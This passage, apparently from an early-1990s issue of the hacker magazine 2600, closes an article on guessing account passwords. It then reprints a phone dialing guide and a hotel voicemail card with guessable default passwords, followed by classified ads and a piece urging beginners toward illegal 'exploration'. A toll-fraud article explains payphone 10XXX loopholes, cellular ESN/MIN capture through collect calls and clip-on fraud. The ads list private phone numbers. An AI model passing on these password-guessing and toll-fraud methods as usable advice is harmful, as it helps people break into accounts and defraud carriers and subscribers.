  2147. word (i.e. for "CMSBATCH" passwords could be "Batch" or "BATCHCMS"). Now add
  2148. on names and wild guesses. This should give you quite a list. All you can do
  2149. is exhaust your list of username/password combinations and move on. You have
  2150. done your best as far as trial and error hacking is concerned. Trashing for
  2151. printouts is also an option.
  2152.  
  2153.     Druidic Death at one time surveyed a VM/CMS system's unencrypted password
  2154. file and wrote the results down as categories. This is a list of his findings:
  2155.  
  2156.     Total number of system users: 157
  2157.     Total number of accounts that can't be logged into: 37
  2158.     Total number of passwords that are a form of the account name: 10
  2159.     Total number of passwords that are the same as the account's name: 3
  2160.     Total number of passwords that are a related word to the account name: 10
  2161.     Total number of passwords that are first names, not the user's own: 17
  2162.     Total number of passwords that are the user's first name: 19
  2163.     Total number of passwords that are words related to the user's job: 7
  2164.     Total number of passwords that are the name of the company: 1
  2165.     Total number of random character passwords: 1
  2166.     Total number of passwords that are, in some format, calendar dates: 32
  2167.     Total number of passwords that were unchanged defaults: 7
  2168.  
  2169.     This should give you an idea of how things are placed in a major corporate
  2170. computer.
  2171.                                Imagination
  2172.     This is what you need to gain access to an account. Being a number cruncher
  2173. just won't do it anymore. In the following segment, I will list out ideas with
  2174. about 20 or 30 examples in each. This article will get you going. You just have
  2175. to finish the job.
  2176.  
  2177.                          Common First and Last Names
  2178.     These can readily be obtainable out of the telephone book, the greatest
  2179. source of all first and last names. Examples:
  2180.     Gus
  2181.     Dave
  2182.     Chris
  2183.     Michele
  2184.     Jessica
  2185.     Arthur
  2186.     Robert
  2187.     Patrick
  2188.     Arnold
  2189.     Benjamin
  2190.     Derek
  2191.     Eddie
  2192.     Shannon
  2193.     Richard
  2194.     Ross
  2195.     Keith
  2196.     William
  2197.     Bubba
  2198.     Mickey
  2199.     Clyde
  2200.                                  Colors
  2201.     Figure it out for yourself, everything is possible. Examples:
  2202.     Blue
  2203.     Black
  2204.     Orange
  2205.     Red
  2206.     Yellow
  2207.     Purple
  2208.     Magenta
  2209.     Green
  2210.  
  2211.                                 The Dictionary
  2212.     The single most important document. Everyone should have one, and if you
  2213. do not have one get one. Many passwords are at your disposal. And, by all
  2214. means when on a Unix, download/usr/dict/words, the online dictionary. I also
  2215. believe that you should not limit your words to just the English versions.
  2216. There is no reason why passwords cannot be in Spanish, French, etc.
  2217.  
  2218.                               Types of Cars
  2219.     Pontiac
  2220.     Ford
  2221.     Chevy
  2222.     Buick
  2223.     Toyota
  2224.     Honda
  2225.     Ferrari
  2226.     Porsche
  2227.  
  2228. Motorcycles and all venue of transportation can be included in this segment.
  2229.  
  2230.                                 Rock Bands
  2231.     Zeppelin
  2232.     Pink floyd
  2233.     Hendrix
  2234.     REM
  2235.     Cream
  2236.     Ozzy
  2237.     Gunsroses
  2238.     Mozart
  2239.     Publicenemy
  2240.     Etc.
  2241.  
  2242.     This section can include magazines, software, profanities (when I was
  2243. validation sysop on Digital Logic's Data Service I don't know how many people
  2244. used the word FUCK when asking for validation). You should have accumulated
  2245. quite a list by now.
  2246.  
  2247.                             Conclusion:
  2248.     This is it. I hope you have learned that nothing should be put past the
  2249. system manager. He is the only person between you and a system that could be
  2250. an excellent source of information. Enjoy!
  2251.  
  2252.   References
  2253.     Look at the following articles for in-depth information for specific
  2254.     operating systems:
  2255.     "Unix From the Ground Up" by The Prophet. Unbelievably helpful in learning
  2256.     Unix.
  2257.     Lex Luthor's "Hacking VAX/VMS". 2600 Magazine, February 1986.
  2258.     "A Guide to the Primos Operating System" by Carrier Culprit. LOD/H
  2259.     Technical Journal
  2260.     "Hacking IBM's VM/CMS Operating System" by Lex Luthor. 2600 Magazine,
  2261.     November and December 1987.
  2262.  
  2263.  
  2264.  
  2265.       ------------------------------------------------------------------
  2266.  
  2267.  
  2268.                      HOW TO USE THE DIAL TELEPHONE
  2269.  
  2270.         (Yet another internal phone company document!  This one we're
  2271.     reprinting in it's entirety on the next two pages, as a public service.)
  2272.  
  2273.     You will find the dial telephone easy to operate and the service it
  2274. provides fast and dependable. The information in the will be helpful to you in
  2275. obtaining the utmost satisfaction and convenience in the use of dial service.
  2276.    New York Telephone Company
  2277.         ***
  2278.  
  2279.                        Listening for Dial Tone
  2280.     On all calls, remove the receiver from the hook and listen for dial tone
  2281. before starting to dial. Dial tone is a steady humming sound in the receiver
  2282. indicating that the line is ready for you to dial.
  2283.  
  2284.            Calls to Central Offices Which You Should Dial Direct
  2285. (Central offices which you should dial direct from your telephone are shown on
  2286. the card furnished to you.)
  2287.  
  2288.     When you hear dial tone, keep the receiver off the hook and dial the first
  2289. two letters of the central office name, the office numeral, then each figure
  2290. of the line number.
  2291.  
  2292.  For example, if dialing WOrth 2-9970 -
  2293.     (1) Place your finger in the opening in the dial over the letter W.
  2294.     (2) Pull the dial around until you strike the finger stop.
  2295.     (3) Remove your finger from the opening, and without touching the dial
  2296.     allow it to return to its normal position.
  2297.     (4) Proceed in the same way to dial the letter 0 and the figures 2-9-9-7
  2298.     and 0. If the number called has a party line letter, dial the number in
  2299.     the same way, followed by the letter at the end of the number.
  2300.  
  2301.     Within a few seconds after you have completed dialing, you should hear
  2302. either the ringing signal, an intermittent burr-rr-ing sound, or the busy
  2303. signal, a rapid buzz-buzz-buzz.
  2304.  
  2305.     If you hear an interrupted buzzing sound, as buzz-buzz -- buzz-buzz, it
  2306. indicates that you have dialed the central office designation incorrectly.
  2307. Hang up the receiver, wait a few seconds, and make another attempt, being
  2308. careful to dial the central office designation correctly.
  2309.  
  2310.     If you do not hear any signal within half a minute, hang up the receiver,
  2311. wait a few seconds and make another attempt.
  2312.  
  2313.     When, for any reason, you do not obtain a connection (for example, the
  2314. called line is busy or does not answer), you will get quicker service if you
  2315. hang up the receiver and try the call again yourself at intervals instead of
  2316. immediately calling the operator for assistance. No charge is made unless you
  2317. obtain an answer from a subscriber's telephone.
  2318.  
  2319.     If you make a mistake while dialing, hang up the receiver at once, wait a
  2320. few seconds, and make another attempt.
  2321.  
  2322.     Before starting to dial a second call, always hang up your receiver for a
  2323. few seconds.
  2324.  
  2325.                   Obtaining Assistance from the Operator
  2326.     If you have trouble in dialing, or if you have occasion to report cases of
  2327. service irregularities, you can reach the operator by placing your finger in
  2328. the opening in the dial over the word "OPERATOR" and then pulling the dial
  2329. around until you strike the finger stop.
  2330.  
  2331.     After connection has once been established with the operator, you may
  2332. recall her by moving your receiver hook up and down slowly. This can be done
  2333. only when you are connected with the operator; on other calls, moving the
  2334. receiver hook will break the connection.
  2335.  
  2336.        Calls from a Party Line or from a Line with an Extension Telephone
  2337.     Always make sure that the line is not in use. If you do not hear the dial
  2338. tone, inquire if the line is being held by some other person. If no response
  2339. is received, hang up the receiver for a few seconds and make another attempt.
  2340.  
  2341.     Listen on the line while dialing, and if you hear another party come in on
  2342. the line or hear successive clicks in the receiver, it indicates that someone
  2343. else on your line is trying to call. Inform him that the line is in use and
  2344. request him to hang up his receiver. When he does so, hang up your own
  2345. receiver for a few seconds, and then remove it and dial the complete number
  2346. again.
  2347.  
  2348.     To call another party on your line, dial the operator, give her the number
  2349. you wish to call, state that it is the number of another party on your line,
  2350. and give her your number.
  2351.  
  2352.     To call an extension telephone on your line, dial the operator, give her
  2353. your number and ask her to ring the extension telephone.
  2354.  
  2355.       Calls by Number to Central Offices  Which You Can Not Dial Direct
  2356.     To place calls by number to central offices within New York City which
  2357. you can not dial direct, or to central offices at nearby points, dial the
  2358. operator and give her the number of the telephone with which you desire to be
  2359. connected, and also the number of the telephone from which you are calling.
  2360. For example --   "Bayside 9-5570 -- Walker 5-9970"
  2361.  
  2362.     If the central office you are calling is not at a nearby point, give the
  2363. operator the name of the city, the name of the state, if desirable, the number
  2364. of the telephone wilh which you desfie to be connected, and also the number of
  2365. the telephone from which you are calling. For example --
  2366.     "Philadelphia, Market 1234 -- Walker 5 -9970"
  2367.  or
  2368.     "Portland, Maine, Preble 1234 -- Walker 5-9970"
  2369.  
  2370.                   Out-of-Town Calls to Particular Persons
  2371.     To make out-of-town calls to particular persons, dial the figures 2-1-1
  2372. and give the operator who answers the name of the person with whom you wish to
  2373. speak, the name of the city, the name of the state, the number of the
  2374. telephone with which you desire to be connected, and also the number of the
  2375. telephone from which you are calling. For example --
  2376.     "Mr.  Paul  Smith  at  Boston. Massachusetts, Main 3340 -- Walker 5- 9970"
  2377.  
  2378.                             Information Calls
  2379. Telephone numbers of subscribers not listed in your directory, and telephone
  2380. numbers of subscribers at out-of-town points may be obtained by calling
  2381. Information.
  2382.     To call Information, dial the figures 4-1-1.
  2383.  
  2384.                                Telegrams
  2385.     To send a telegram, look up the telephone number of the desired telegraph
  2386. company in the directory, and dial this number as you would any other.
  2387.  
  2388.                       Calls to the Telephone Company
  2389.  Repair Service....Dial the figures 6-1-1
  2390.  Business Office...Dial the figures 8-1-1
  2391.  Time of Day  .......  Dial MEridian 7-1212
  2392.  
  2393.                            Emergency Calls
  2394.                      (Police, Fire, Ambulance)
  2395.     Dial the operator, give her your number and say --
  2396.  "I want a policeman."
  2397.  "I want to report a fire."
  2398.  "I want an ambulance."
  2399.  
  2400.     If compelled to leave the telephone before the desired station answers,
  2401. tell the operator where help is required.
  2402.  
  2403.     You may also reach the Police and the Fire Departments directly by dialing
  2404. the numbers listed in the directory.
  2405.  
  2406.                           Dial Coin Telephones
  2407.     The operation of dial coin telephones is quite similar to that of your own
  2408. dial telephone. The only differences are that it is necessary to deposit a
  2409. coin in order to obtain dial tone (indicating that the line is ready for you
  2410. to dial) and that telegrams are sent by dialing the operator and telling her
  2411. the telegraph company desired. If the called line is busy or does not answer,
  2412. the coin will be returned after the receiver is hung up.
  2413.  
  2414.  
  2415.  
  2416.       ------------------------------------------------------------------
  2417.  
  2418.  
  2419.                               Meridian Mail
  2420.     We are pleased to introduce Meridian Mail, a telephone answering system
  2421. designed to provide guests with the best possible message service.
  2422.  
  2423.     When you are unable to answer calls to your room, Meridian Mail answers
  2424. them for you.  Callers are informed that you are not available.  Messages
  2425. can be left for you automatically, in detail, in any language, and in
  2426. complete confidentiality.
  2427.  
  2428.     Your messages are stored in your personal "Voice Mailbox", to be retrieved
  2429. directly by you.  Unless you choose to delete them, messages remain in your
  2430. voice mailbox until you check out.
  2431.  
  2432.                        To Hear Your Messages
  2433.     From your room
  2434.         The light on your telephone will flash when you have a new message.
  2435.  
  2436.         To retrieve your messages:
  2437.             Lift the handset and press MESSAGE KEY.
  2438.  
  2439.         Reviewing the messages in your mailbox:
  2440.             To move to the previous message, press 4.
  2441.             To move to the next message, press 6.
  2442.  
  2443.         Listening to your messages:
  2444.             To play, press 2.
  2445.             To continue playback, press 2 again.
  2446.             To step forward, press 3.  This allows you to skip quickly
  2447.             through a long message.
  2448.             To step backward, press1.  This allows you to review a portion
  2449.             of the message.
  2450.  
  2451.     To get help
  2452.         If you have trouble while accessing your mailbox, Meridian Mail
  2453.         automatically prompts you with the helpful instructions.
  2454.  
  2455.         If you need more help:
  2456.             Press * any time while you are using Meridian Mail.
  2457.  
  2458.         If you would rather speak to an attendant:
  2459.             From inside the Hotel, dial 0.
  2460.             From outside the hotel, dial 484-1000.
  2461.  
  2462.     From outside your room
  2463.         You can retrieve messages while away from your room.
  2464.             From inside the hotel, dial 4434, from outside the hotel, dial
  2465.             646-4434 or 484-1000.
  2466.             Enter your room number and press #
  2467.             Enter your password and press #
  2468.  
  2469.     Using a rotary phone
  2470.         When using a rotary phone, you can only listen to your messages.  You
  2471.         need a touch-tone phone to use any special commands.
  2472.             From inside the hotel, dial 0
  2473.             From outside the hotel, dial 202-484-1000
  2474.             Give the attendant your name, room number, and password
  2475.  
  2476.     "Other mail"
  2477.         If you have other messages at the front desk, Meridian Mail informs
  2478.         you that you have "other mail".
  2479.         To retrieve your other mail
  2480.             Press 0.
  2481.  
  2482.     Your Password
  2483.         When you check in, your password is initially set to the first four
  2484.         digits of your last name.  For example:
  2485.             Last Name          Password
  2486.              Smith              Smit
  2487.              Jones              Jone
  2488.  
  2489.         Contact the front desk if you need more information on passwords.
  2490.  
  2491.  
  2492. (Computer hackers at the CFP conference in Washington DC this spring found it
  2493. astoundingly easy to get into guests' mailbox. All you need is a name and a room
  2494. number! We wonder how many other hotels are so trusting.)
  2495.  
  2496.  
  2497.  
  2498.       ------------------------------------------------------------------
  2499.  
  2500.  
  2501.                            2600 Marketplace
  2502.  
  2503. 2600 meetings: New York City: First friday of the month at the Citicorp
  2504. Center--from 5 to 8 pm in the lobby near the payphones, 153 E 53rd St.,
  2505. between Lexington and 3rd Avenues. Come by, drop off articles, ask questions,
  2506. find the undercover agents. Call 516-751-2600 for more info. Payphone numbers:
  2507. 212-223-9011, 212-223-8927, 212-308-8044, 212-308-8162.  Washington DC: In
  2508. the Pentagon City mall from 5 to 8 pm on the first Friday of the month. San
  2509. Francisco: At 4 Embarcadero Plaza (inside) from 5 to 8 pm on the first Friday
  2510. of the month. Payphone numbers: 415-398-9803,4,5,6. Los Angeles: At tbe Union
  2511. Station, corner of Macy St. and Alameda from 5 to 8 pm, first Friday of the
  2512. month. Inside main entrance by bank of phones. Payphone numbers: 213-972-
  2513. 9358, 9388, 9506, 9519, 9520; 213-625-9923, 9924; 213-614-9849, 9872, 9918,
  2514. 9926. Chicago: Century Mall, 2828 Clark St., 5 pm to 8 pm, first Friday of the
  2515. month, lower level, by the payphones. St. Louis: At the Galleria, Highway 40
  2516. and Brentwood, 5 pm to 8 pm, first Friday of the month, lower level, food
  2517. court area, by the theaters. Philedelphea: 6 pm at the 30th Street Amtmk
  2518. station at 30th & Market, under the "Stairwell 7" sign. Payphone numbers: 215-
  2519. 222- 9880,9881,9779,9799,9632, and 387-9751. For info, call 215-552-8826.
  2520. Cambridge, MA: 6 pm at Harvard Square, outside the "Au Bon Pain" bakery store.
  2521. If it's freezing, then inside "The Garage" by the Pizza Pad on the second
  2522. floor. Call 516-751-2600 to start a meeting In your city. 
  2523.  
  2524. TOP QUALITY computer virus info. Little Black Book of Computer Viruses $14.95,
  2525. add $2.50 postage. Disassemblies of popular viruses, fully commented and fully
  2526. explained. Write for list. American Eagle Publications, Box 41401, Tucson, AZ
  2527. 85717. 
  2528.  
  2529. ARRESTED  DEVELOPMENT.   H/P/A/V. +31.79.426079. Renegade 8-10 UUCP DOMAINS!
  2530. Virnet Node, PGP Areas, 386-33mhz, 300mb, USR DS 38k4.
  2531.  
  2532. LOOKING FOR ANYONE and everyone wanting to trade ideas, Amiga files, info
  2533. about "interesting" things. I have about 10 megs of text files, ALWAYS looking
  2534. for more! Contact Steve at 414-422-1067 or cmail rlippen@csd4.csd.uwm.edu
  2535.  
  2536. WE CAME, WE SAW, WE CONQUERED. 11"x 17" full color poster of pirate flag
  2537. flying in front of AT&T facility. Send $6 to P.O. Box 771071, Wichita, KS
  2538. 67277-1072. 
  2539.  
  2540. PHONES TAPPED, office/home bugged, spouse cheating. Then this catalogue is for
  2541. you! Specialized equipment, items, and sources. It's time to get even.
  2542. Surveillance, countermeasures. espionage, personal protection. Send $5 check
  2543. or money order to B.B.I., PO Box 978, Dept. 2-6, Shoreham, NY 11786. 
  2544.  
  2545. TAP BACK ISSUES, complete set Vol. 1-91 of QUALITY copies from originals.
  2546. Includes schematics and indexes.  $100 postpaid.  Via UPS or 1st Class Mail.
  2547. Copy of 1971 Esquire article The Secrets of the Little Blue Box" $5 & large
  2548. SASE w/52 cents of stamps. Pete G., PO Box 463, Mr. Laurol, NJ 08054. We are
  2549. the Original!
  2550.  
  2551. PRINT YOUR ZIP CODE IN BARCODE. A great label program that allows you to use a
  2552. database of address to print label with barcode. You also type and print a
  2553. custom label. Send $9 no check to: H. Kindel, 5662 Calle Real Suite 171,
  2554. Goleta, CA 93117. IBM only. 
  2555.  
  2556. GENUINE 6.5536 MHZ CRYSTALS only $5.00 each. Orders shipped postpaid via First
  2557. Class Mail. Send payment with name and address to Electronic Design Systems,
  2558. 144 West Eagle Road, Suite 108, Havenown, PA 19083. Also: information wanted
  2559. on Northeast Electronics Corp's TTS-59A portable MF sender and TTS-2762R MF
  2560. and loop signalling display. Need manuals, schematics, alignment and
  2561. calibration instructions (or photocopies). Will reward finder. 
  2562.  
  2563. WIRELESS MICROPHONE and wireless telephone transmitter kits. Featured in the
  2564. WINTER 1991-92 2600. Complete kit of paris with PC board. $20 CASH ONI.Y, or $
  2565. 35 for both (no checks). DEMON DIALER K/T as reviewed in this issue of 2600.
  2566. Designed and developed in Holland. Produces ALL voiceband signals used in
  2567. worldwide telecommunications networks. Send $250 CASH ONLY (DM 350) to
  2568. Hack-Tic Technologies, Postbus 22953, 1100 DL Amsterdam, Netherlands (allow up
  2569. to 12 weeks for delivery). Please call +31 20 6001480 * 144,. Absolutely no
  2570. checks accepted!
  2571.  
  2572. FORMER U.S. ARMY ELECTRONIC WARFARE TECHNICIAN with TS clearance looking for
  2573. surveillance work which requires cunning, ingenuity, and skill. Prolocks of
  2574. Atlantic City, Box 1769, Atlantic City, NJ 08404.
  2575.  
  2576. TIN SHACK BBS (818) 992-3321. The BBS where hackers abound! Over a gig of
  2577. files, many on-line games! Multi-line! 2600 Magazine readers get FREE elite
  2578. access!
  2579.  
  2580. WOULD LIKE TO TRADE IDEAS with and befriend any fellow 2600 readers.  Call Mike
  2581. at 414-458-6561 if interested.
  2582.  
  2583.             *******************************************************
  2584.             *****                                             *****
  2585.             *****   Marketplace ads are FREE to subscribers   *****
  2586.             *****                                             *****
  2587.             *******************************************************
  2588.  
  2589.  
  2590.  
  2591.       ------------------------------------------------------------------
  2592.  
  2593.  
  2594.                              getting started
  2595.                              by Phord Prefect
  2596.  
  2597.     So you watched something on TV and it was about hackers... you said
  2598. "nifty"  ....  You read something on a BBS about free phone calling... you
  2599. said "cool"  ....  You started checking out books from the library about
  2600. Knight Lightning, or maybe even blue boxing (Esquire, October 1971 )... you
  2601. said "wow"  ....  You got this magazine and said, "I have to do this" but
  2602. didn't know where to start.
  2603.  
  2604. Well, you're not alone  ....
  2605.  
  2606.     Your curiosity overwhelms you, but yet you can't seem to find that little
  2607. thing to start your exploration. You could try looking around for other
  2608. hackers, but if they have a lick of sense they won't make it too obvious. Try
  2609. looking harder, they might just come to you.
  2610.  
  2611.     So this doesn't work... you just can't seem to find any, or they're
  2612. mostly pirates and can't help you. Well, you're just going to have to get the
  2613. balls to do something illegal in your life (but I'm not forcing you), so do
  2614. something. This magazine is full of examples. Sure there's stealing MCI
  2615. calling cards, building blue, red, or whatever boxes, but there are much
  2616. deeper things. If you defraud the phone company, you're not a hacker, you just
  2617. get free phone calls. You need a passion for the system. You need a
  2618. willingness to learn a lot about the system before you do something.
  2619.  
  2620.     If you're looking for free phone calls, hurry up and do that and stop
  2621. wasting your time. Like I said, you're not a hacker, you just are bothered and
  2622. need a little trick to get onto BBS's in some distant place.
  2623.  
  2624.     If you have a curiosity for the system, then you're in the right place.
  2625. The phone company is something so amazingly huge that one could probably spend
  2626. a lifetime exploring it.  This "exploring" is what 2600 is all about. I know
  2627. that you computer genius teenagers don't need manuals for things (like
  2628. computer programs and VCR's) and are really impatient, so you don't want the
  2629. bullshit. You want to know how to get into systems now. Well, relax. You made
  2630. a good decision buying this mag, but you have to learn first. You need  to
  2631. know this thing backwards and forwards or else you'll screw up and get caught.
  2632.  
  2633.     So, in response to the beginners writing in and wanting to "know how to
  2634. get free phone calls and other phone tricks", you need to get knowledge. Read
  2635. everything you can get your hands on and when you feel the time is right,
  2636. after you know exactly how, where, why, and when to do it, do it.
  2637.  
  2638.  
  2639.  
  2640.       ------------------------------------------------------------------
  2641.  
  2642.  
  2643.                      Restricted Data Transmissions
  2644.  
  2645.     Toll fraud is a serious problem that plagues the telecommunications
  2646. industry. Recently l have acquired a collection of trashed documents detailing
  2647. what AT&T and Bellcore are doing to stop these "thefts."l found these papers
  2648. very enlightening and occasionally humorous. A few insights into what's
  2649. bugging the telco.
  2650.  
  2651.     Toll Fraud Prevention Committee (TFPC): This is an industry-wide "forum"
  2652. committee set up in conjunction with Bellcore that deals with, guess what,
  2653. toll fraud. The TFPC has "super elite" meetings every once in awhile. All
  2654. participants are required to sign non-disclosure agreements.  Fortunately,
  2655. the participants frequently toss their notes in the POTC (Plain Old Trash
  2656. Can -- see. I can make stupid acronyms just like Bellcore!). As far as I'm
  2657. concerned, once it's in the POTC, it's PD (public domain)!
  2658.  
  2659.     The "open issues" concerning the TFPC currently are Third Number
  2660. Billing Fraud, International Incoming Collect Calls to Payphones, and Incoming
  2661. Collect Calls to Cellular. Apparently, they have noticed a marked increase in
  2662. third number billing fraud in California. To quote a memo, "The most prevalent
  2663. fraud scams include originating from coin/copt (aka COCOTs) phones as well as
  2664. business and residence service that is fraudulently established."  Third
  2665. party billing from COCOTs is an old trick. Another type of COCOT abuse
  2666. discussed 10XXX (where XXX is the code for a certain LD carrier), the caller
  2667. on the COCOT gets to choose their LD carrier. However, in some cases
  2668. the LEC (Local Exchange Carrier) strips off the 10XXX and then sends the call
  2669. to the lXC (Inter-Exchange Carrier, the guys that place the LD call) as a 1 +
  2670. directly dialed call. So, when you dial 10XXX+O11+international number, the
  2671. LEC strips the 10XXX and the IXC sees the call as directly dialed
  2672. international and assumes the call has been paid for by coin into the COCOT.
  2673. Dialing 10XXX+1+ACN also sometimes works for LD calls within the United
  2674. States. Anyway, COCOT providers are wigging out a bit because, while they must
  2675. provide 10XXX+O service, they want to block the 10XXX+1 and 10XXX+011
  2676. loopholes, but LEC's have chosen to provide COCOTs with a standard business
  2677. line which is not capable of distinguishing between these different
  2678. situations, which is why central offices have been typically programmed to
  2679. block all types of 10XXX calls from COCOTs. Thanks to the FCC, they can't do
  2680. that anymore; it's breaking the law.  So COs have been reprogrammed into
  2681. accepting these 10XXX calls from all COCOTs, and the burden of selectively
  2682. blocking the 10XXX+1 and 10XXX+011 loopholes often  falls  upon  the  COCOT
  2683. manufacturer. They gotta build lt into the COCOT hardware itself!
  2684.  
  2685.     Well, many early COCOTs cannot selectively unblock 10XXX+O, so their
  2686. owners face a grim choice between ignoring the unblocking law (thereby facing
  2687. legal problems), unblocking all 10XXX  calls  (thereby  opening themselves up
  2688. to massive fraud), or replacing their COCOTs with expensive, more
  2689. sophisticated models. Other LECs have begun offering call screening and other
  2690. methods to stop this type of fraud, but the whole situation is still pretty
  2691. messy.  By the way, for a comprehensive list of 10XXX carrier access codes,
  2692. see the Autumn 1989 issue of 2600, page 42 and 43. While they are constantly
  2693. changing, most of these should still be good.
  2694.  
  2695.     Incoming international Collect to Cellular: according to the notes when
  2696. a cellular phone is turned on, it 'checks in' with the local cellular office.
  2697. When this happens, a device that 'reads' radio waves can capture the
  2698. identification of the cellular phone. A tremendous volume of 'cloned'
  2699. fraudulent cellular calls are going to Lebanon." Same old trick, grabbing the
  2700. cell phone's ESN/MIN as it's broadcast. The only twist is that you call
  2701. someone's cellular phone collect in order to get them to pick up and broadcast
  2702. their ESN/MIN (they will probably refuse the call, but they will have
  2703. broadcast their ESN/MIN nevertheless!) But why Lebanon?
  2704.  
  2705.     The American Public Communications Council mentioned "a desire for the
  2706. TFPC to be involved in the resolution of clip-on fraud." Maybe you guys should
  2707. try better shielding of the phone line coming out the back of the COCOT??
  2708. Apparently, clip-on fraud has really taken off with the recent flux of new
  2709. COCOTs. COCOTs operate off a plain old customer loop, so clipping onto the
  2710. ring and tip outside the body of the COCOT works nicely. That is, assuming you
  2711. can get at the cables and get through the insulation.
  2712.  
  2713.     Incoming International Collect: This is a big issue. A person from overseas
  2714. calls a payphone collect in the United States. His/her buddy answers the
  2715. payphone and says, "Sure, l accept the charges." Believe it or not, this trick
  2716. works many times! Here's why. In the United  States, databases containing
  2717. all public telephone numbers provide a reasonable measure of control over
  2718. domestic collect abuse and are available to all carriers for a per-use charge.
  2719. These databases are offered and maintained by the local telephone companies
  2720. (LTC). Domestic collect-to-coin calling works well, because most operator
  2721. services systems in the United States query this database on each domestic
  2722. collect call. Most Local Exchange Carriers in the United States also offer
  2723. this database service to owners of COCOTs (for those few that accept incoming
  2724. calls).
  2725.  
  2726.     However, international operators across the world do not share access to
  2727. this database, just as United States international operators do not have
  2728. database access overseas! The CCITT, the international consortium of
  2729. telecommunications carriers, recognized this serious problem many years ago
  2730. with its strong recommendation to utilize a standardized coin phone
  2731. recognition tone (commonly called the cuckoo tone) on every public telephone
  2732. line number. Such a tone would be easily recognized by operators worldwide,
  2733. and is currently in use by many foreign telcos.
  2734.  
  2735.     The United States decided to ignore this logically sound recommendation,
  2736. having already employed a numbering strategy for public telephones which,
  2737. together with a reference document called the "Route Bulletin", alerted
  2738. foreign operators that the called number should be checked for coin with the
  2739. United States inward operator. This simple procedure greatly reduced the
  2740. number of times that the foreign operator had to check with the United States
  2741. operator, yet was effective at controlling abuse. Everyone slept soundly.
  2742.  
  2743.     But after the bust-up of AT&T in 1984, the local telephone companies,
  2744. operating independently and under pressure to offer new services (cellular,
  2745. pagers, etc.), abandoned the public phone fixed numbering strategy! In
  2746. addition, in June of 1984 the FCC decided to allow the birth of private
  2747. payphones (COCOTs). And, up until 1989, nothing was done to replace the fraud
  2748. prevention system. Can you say "open season"?
  2749.  
  2750.     In 1989, the TFPC began seeking a solution to the growing volume of
  2751. fraudulent collect calls resulting from this void in the fraud prevention
  2752. architecture. Numerous solutions were explored. A primary solution was chosen.
  2753.  
  2754.     Validation database! Yes, the TFPC chose to support 100 percent the LEC
  2755. database solution, with the cuckoo payphone recognition tone as one of a
  2756. number of secondary solutions. This decision caused problems, problems,
  2757. problems, since it was evaluated that a great number of foreign telcos would
  2758. be unable to implement this database-checking routine (for a variety of
  2759. technical reasons). Furthermore, because this TFPC "solution" to the United
  2760. States' problem is not in conformance with international requirements, the
  2761. foreign telcos view it with strong opposition as an unacceptable solution due
  2762. to the additional worktime that would be incurred and the blatant unwillingness
  2763. on the part of the United States to follow an effective and longstanding
  2764. international standard (shit, we balked at using metrics, why not this too?).
  2765.  
  2766.     To this day, the TFPC is still bouncing around ideas for this. And the
  2767. susceptibility of United States payphones to intemational incoming collect
  2768. calls remains wide open. Various phone companies are currently fighting the
  2769. cuckoo tone system, because they are cheap mothers and dont want to spend the
  2770. estimated $500-700 per payphone to install the cuckoo tone technology. If the
  2771. cuckoo tone were implemented, it would virtually eliminate the problem of
  2772. international incoming collect calls. But it hasn't been  ....
  2773.  
  2774.     Other brilliant "secondary" solutions recommended by the TFTP are:
  2775.     1) Eliminate the ringer on the payphone.
  2776.     2) Route all such calls thru a United States operator.
  2777.     3) Eliminate incoming service to payphones altogether.
  2778.  
  2779.     And so on. As you can see, this is a fascinating story, and the latest TFTP
  2780. meeting ended with the note "The issue was discussed at some length with the
  2781. end result of it becoming a new issue." Truly the work of geniuses.
  2782.  
  2783.     In closing, I want to share with you a quote from an article I dug out from
  2784. a pile of coffee grinds. It's from Payphone Exchange Magazine.
  2785.  
  2786.     The fewer the number of people aware of a primary line of defense coming
  2787. down, the better. Any qualified person reading the hacker and underground
  2788. publications knows that many of their articles are written by current LTC and
  2789. IXC employees [or people like me who go through their garbage!]. Loose lips
  2790. sink ships. Unrestricted distribution of sensitive information permits fraud.
  2791. Both cost dearly. Let's stop them both today."
  2792.  
  2793.  All can say is... fuck that.
  2794.  
  2795. According to internal phone company documents that were sent to us,
  2796. "fraudulent collect ceiling is an issue that has plagued the telephone industry
  2797. for nearly as many years as the service has been available to the public." One
  2798. of the biggest problems is, admittedly, that the United States never
  2799. implemented the CCITT recommendation to have an internationally recognizable
  2800. tone sound when a payphone picks up an incoming call. Prior to 1984, the
  2801. United States had a numbering scheme. By using something called the Route
  2802. Bulletin, operators from other countries were able to tell if they should
  2803. check with the inward operator in the United States to see if the phone was .
  2804. payphone ('checking for coin'). This simple procedure greatly reduced the
  2805. number of times that the foreign operator had to check with the US operator.
  2806. yet was effective at controlling abuse.' A major problem now exists because
  2807. after divestiture, this numbering scheme wes abandoned. Added to this was the
  2808. introduction of COCOTs (private payphones). Confusion over the true status
  2809. of these phones and the growing number of these instruments caused the local
  2810. telephone companies to select numbers for these instruments out of the
  2811. general (non-coin) number pool. After first suggesting that every country in
  2812. the world first consult a database before processing any collect calls to the
  2813. United States, the interexchange carriers had a change of heart. The rest of
  2814. the world took a rather dim view of the United States imposing its will upon
  2815. everyone else end ignoring (as usual) the international standard. As a result,
  2816. it's now been suggested by American phone companies that the coin phone
  2817. recognition tone be implemented. Apart from everybody else in the world being
  2818. opposed to it, the disadvantages of relying upon the database included:
  2819. questions about database accuracy, the fact that training would be required,
  2820. the fact that validation would require two operators, and that there are no
  2821. contractual protections for any database failures. The companies also believe
  2822. such a tone will help cut down on fraud within the United States. AT&T says.
  2823. "Public and coin phones are very often the vehicle used by defrauders. Posing
  2824. es telephone company employers, fraud perpetrators convince consumers to
  2825. accept numerous bills to third calls and to give out their billing card PIN. A
  2826. signal such as the recognition tone, when nationally recognized by all US
  2827. subscribers as signifying a coin phone, could spell an end to scammars who
  2828. conduct business from payphones and leave coin phone numbers as a call back
  2829. number to their unsuspecting prey." The new system, including a voice message,
  2830. will be tested with Pacific Bell. BellSouth, however, believes that the
  2831. database system could still be used from oversees, provided the interexchange
  2832. carriers set up separate trunks to carry 0+ traffic and do the validation
  2833. themselves.
  2834.  
  2835.     Among the most common forms of third number billing fraud the phone
  2836. companies cite: "billing to voice mail, scams,  cellular  (to  and from),
  2837. international, billing to unassigned numbers, recorded acceptance messages,
  2838. database failures and inaccuracies, as well as no live verification."
  2839.  
  2840.     AT&T also stated, "With growing frequency, defrauders are establishing
  2841. telephone service end billing large numbers of calls to that service, with no
  2842. intention of paying the bill. This is often done by providing the LEC (local
  2843. company) with fraudulent information on the service application.'
  2844.  
  2845.     Other issues being discussed within the telco inner circle include
  2846. providing COCOTs with their own ANI and an apparent blue box type of fraud
  2847. involving US Sprint.
  2848.  
  2849.  
